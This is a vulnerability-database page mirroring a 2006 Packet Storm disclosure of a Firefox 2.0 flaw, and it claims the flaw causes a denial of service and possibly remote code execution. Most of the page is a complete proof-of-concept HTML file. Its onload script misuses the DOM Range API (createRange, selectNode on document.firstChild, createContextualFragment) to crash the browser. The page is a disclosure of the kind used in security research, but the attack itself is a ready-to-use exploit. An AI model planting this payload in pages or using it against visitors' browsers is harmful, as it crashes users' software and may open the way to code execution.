Lucene search
K

Firefox2.0-dos.txt

🗓️ 01 Nov 2006 00:00:00Reported by xxxxType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

New Firefox 2.0 flaw leads to DoS and potential remote code executio

Code
`New Flaw in Firefox 2.0: DoS and possible remote code execution  
  
PoC here: http://werterxyz.altervista.org/Firefox2Range.htm  
  
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">  
<html>  
<head>  
<script type="text/javascript">  
function do_crash()  
{  
var range;  
  
range = document.createRange();  
range.selectNode(document.firstChild);  
range.createContextualFragment('<span></span>');  
}  
</script>  
</head>  
<body onload="do_crash()">  
<p>Good bye Firefox!</p>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation